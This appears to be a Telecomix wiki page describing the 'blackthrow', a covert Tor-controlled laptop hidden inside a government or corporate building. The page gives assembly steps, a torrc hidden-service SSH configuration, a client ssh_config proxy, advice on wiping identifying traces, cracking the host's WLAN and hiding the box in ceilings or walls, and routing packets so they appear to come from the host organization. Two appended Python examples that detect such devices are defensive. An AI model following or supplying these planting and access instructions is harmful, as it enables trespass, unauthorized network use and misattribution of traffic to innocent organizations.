Blackthrow
From Telecomix Crypto Munitions Bureau
The blackthrow box is an effective piece of anti-censorship peacefare equipment developed by the Telecomix Crypto Munitions Bureau (TCMB). A blackthrow is an anonymously remotely controlled drone that can be used to send any type of packets to any location on the internets. Communication with an operational blackthrow is slow, but its striking power against censorship can be equated to the power of a submerged nuclear submarine.
A blackthrow is a small computer that can be hidden inside government agencies or corporations. It connects to the TOR or I2P networks and publishes its SSH server as a hidden service in either of these networks. The TCMB field agent can then connect to the blackthrow anonymously and remote control it to deliver any type of packets to any location on the internets that the host organization can connect to. It will look as if the host organization is responsible for the packets that are sent.
Alternative names for the blackthrow are the dropbox and the kamikaze box. The name dropbox comes from the fact that the box delivery system is akin to shopdropping. The name kamikaze box comes from the fact that once the box is installed, it will not be possible to repair it, as the risk of detection is too high. The name blackthrow is a direct translation of the Swedish word svartkast. The blackthrow is just one of many types of peacefare boxes for field use developed by the TCMB.
Blackthrow assembly instructions
The field agent should be aware of the limiting factors of the box, as it needs to be an autonomous piece of equipment. Once installed, it should never again be physically accessed. Instead of trying to repair the box if it fails, the TCMB operative is advised to focus on creating new boxes that have as long a life expectancy as possible. All blackthrow operations are classified and should be carried out in silence, unless the agent is anonymized.
0. The blackthrow itself consists of only a laptop with a WLAN card. Nothing else is needed. People throw away old laptops that are still useful; the best method to find new equipment is to search the trash. You can also use mini PCs (for example EPIA-based): these are cheap, small, silent and low in power consumption, making them harder to find.
1. There should be no identifying information that could lead back to the agent. TCMB therefore recommends that the hard disc be carefully wiped. Once the machine is installed it is only a matter of time before someone finds it, even if it might take years before this happens to a well hidden blackthrow. Once it happens though, it is possible that the sysadmins will read the hard disc to learn more about the box's origins.
2. Install the operating system of choice on the laptop. Because of the low communication speeds with a hidden box, it is recommended that no graphical interface is installed. Make sure that you do not enter any identifying information whatsoever in the installation process.
3. Once the operating system is installed, TOR or I2P can be installed. It is easier to use TOR. In Debian Linux, type "apt-get install tor". In OpenBSD, type "pkg_add -vi tor".
4. For anonymous remote control of the blackthrow, the secure shell (SSH) server needs to be made accessible as a hidden service. To do this, edit the /etc/tor/torrc file so that it contains the following two lines.
HiddenServiceDir /etc/tor/hidden/
HiddenServicePort 22 127.0.0.1:22
You will also need to create the /etc/tor/hidden/ directory (make sure it is owned by the account that TOR runs as; in Debian, it is debian-tor).
Then restart TOR. Inside the file /etc/tor/hidden/hostname, there will now be a string that ends in ".onion". This is the anonymous destination of the blackthrow's SSH server in the TOR network. It can be used to remotely control the machine anonymously.
5. TCMB recommends that you very carefully clean the laptop. At this point, it should not matter if you destroy parts of the laptop in order to clean it from identifying products. The blackthrow should be able to operate fully autonomously without the need for physical access before you install it in any host organization.
6. Please also consider painting the blackthrow with the PsyOP tactical color patterns for maximum perplexity.
7. Install the blackthrow at a suitable location. If necessary, you will have to crack their WLAN first. In office areas, it is often possible to hide machinery above any of the roof tiles. Cable racks ("kabelstegar") are also possible candidates. Below the floor or inside walls are also possible hideouts. Find locations where no one would ever look casually.
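Step 1 notes that whoever finds the box may read its disc. As an added example (not part of the original wiki page), this Python code parses a recovered torrc, lists each hidden service with its port mappings and flags any that forward to the local SSH port; the sample torrc, its second service path and the function names are constructed for illustration.

```python
"""List hidden services declared in a torrc and flag ones exposing local SSH.
SAMPLE_TORRC is constructed for this example; function names are hypothetical."""

SAMPLE_TORRC = """\
# constructed sample
SocksPort 9050
HiddenServiceDir /etc/tor/hidden/
HiddenServicePort 22 127.0.0.1:22
# second service, constructed
HiddenServiceDir /var/lib/tor/web/
HiddenServicePort 80 8080
HiddenServicePort 443
"""

def parse_hidden_services(torrc_text):
    """Return [{'dir': str, 'ports': [(virtual_port, target)]}] in file order."""
    services = []
    for raw in torrc_text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        key, args = parts[0].lower(), parts[1:]   # option names are case-insensitive
        if key == "hiddenservicedir" and args:
            services.append({"dir": args[0], "ports": []})
        elif key == "hiddenserviceport" and args and services:
            virt = int(args[0])
            # The target is optional; Tor defaults to the same port on 127.0.0.1.
            target = args[1] if len(args) > 1 else f"127.0.0.1:{virt}"
            if target.isdigit():                   # a bare port means localhost
                target = f"127.0.0.1:{target}"
            services[-1]["ports"].append((virt, target))
    return services

def exposes_ssh(service, ssh_port=22):
    """True if any mapping of this service forwards to the local SSH port."""
    return any(t.rsplit(":", 1)[-1] == str(ssh_port) for _, t in service["ports"])

if __name__ == "__main__":
    for svc in parse_hidden_services(SAMPLE_TORRC):
        print(svc["dir"], svc["ports"], "SSH exposed" if exposes_ssh(svc) else "")
```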
Accessing the blackthrow
These instructions should not be applied to the blackthrow itself, but only on the operator's computer.
To access the blackthrow, the operator needs to compile a small program and use it together with SSH. You can download it here, or directly from this wiki. Compile it with "gcc -o connect ./connect.c". Move the executable file connect to some directory that you enjoy.
Then edit /etc/ssh/ssh_config. Append the following lines to the end of the file:
# use TOR to access TOR services lol :)
Host *.onion
ProxyCommand /xxx/yyy/connect -S localhost:9050 %h %p
Replace xxx/yyy/ with the directory where you placed the connect program.
You should now be able to anonymously access the blackthrow by just typing the following (replace "fca4q5tuyhdxas7p.onion" with your own destination, which you got from the blackthrow's /etc/tor/hidden/hostname file):
ssh root@fca4q5tuyhdxas7p.onion -p 22
It will take about ten to thirty seconds to connect to the blackthrow. Once connected, an issued command will take about 2-3 seconds to return its result. The delay is caused by the extensive hopping between different computers in the TOR network. Even though the blackthrow is slow to respond, its bandwidth to the internets is as high as the host organization's. Consider piping the output to files instead of directly back to the terminal. The use of nohup, cron and other services could help with performing tasks even if the connection is broken. Also remember that while it takes time to interact with the blackthrow, it is still possible to transfer rather large files over TOR with ease. Interactive communication is much slower than non-interactive: use files, not the terminal, to dump the output of larger tasks.
OnionCat
It is possible to forward any type of information over OnionCat via the blackthrows, to the internets anonymously. This means that you do not have to log in to send packets, if the svartkast is configured to route packets from the OnionCat interface to its ordinary WLAN interface.
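Seen from the host organization's network, a box like this is a WLAN client missing from the asset inventory that holds long-lived connections to Tor relays. The following added example (not part of the original wiki page) correlates DHCP leases, an inventory and flow records to surface such a client; the log formats, addresses, MACs and the one-hour threshold are all constructed assumptions.

```python
"""Flag WLAN clients that hold long-lived connections to Tor relays.
All data below is constructed (made-up MACs, documentation IP ranges)."""
from collections import defaultdict

# Assumptions: KNOWN_MACS comes from the asset inventory; TOR_RELAYS would be
# loaded from the public Tor relay list instead of being hard-coded.
KNOWN_MACS = {"00:11:22:33:44:55", "00:11:22:33:44:66"}
TOR_RELAYS = {"192.0.2.10", "198.51.100.7"}

DHCP_LEASES = """\
10.0.5.21 00:11:22:33:44:55 hr-laptop-04
10.0.5.37 00:11:22:33:44:66 printer-2f
10.0.5.88 02:aa:bb:cc:dd:01 localhost
"""

# Flow export, one record per line: src_ip dst_ip dst_port duration_seconds
FLOWS = """\
10.0.5.21 203.0.113.5 443 12
10.0.5.21 192.0.2.10 9001 40
10.0.5.88 192.0.2.10 9001 86000
10.0.5.88 198.51.100.7 443 43000
10.0.5.37 10.0.0.2 53 1
"""

def parse_leases(text):
    """Return {ip: (mac, hostname)} from 'ip mac hostname' lines."""
    return {ip: (mac.lower(), host)
            for ip, mac, host in (line.split() for line in text.splitlines())}

def find_tor_clients(leases, flows, relays, known_macs, min_seconds=3600):
    """Return one finding per internal IP whose relay time reaches min_seconds."""
    seconds = defaultdict(int)
    for line in flows.splitlines():
        src, dst, _port, duration = line.split()
        if dst in relays:
            seconds[src] += int(duration)
    findings = []
    for src, total in seconds.items():
        if total < min_seconds:
            continue  # brief contact, below the reporting threshold
        mac, host = leases.get(src, ("unknown", "unknown"))
        findings.append({"ip": src, "mac": mac, "hostname": host,
                         "tor_seconds": total, "in_inventory": mac in known_macs})
    # Devices missing from the inventory first, then longest relay time.
    return sorted(findings, key=lambda f: (f["in_inventory"], -f["tor_seconds"]))

if __name__ == "__main__":
    for finding in find_tor_clients(parse_leases(DHCP_LEASES), FLOWS, TOR_RELAYS, KNOWN_MACS):
        print(finding)
```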
See also
- Chaosbox
- Parallel sysplex network
- Blackthrow drafts and ideas <-- drafts :-)
- SvartFON


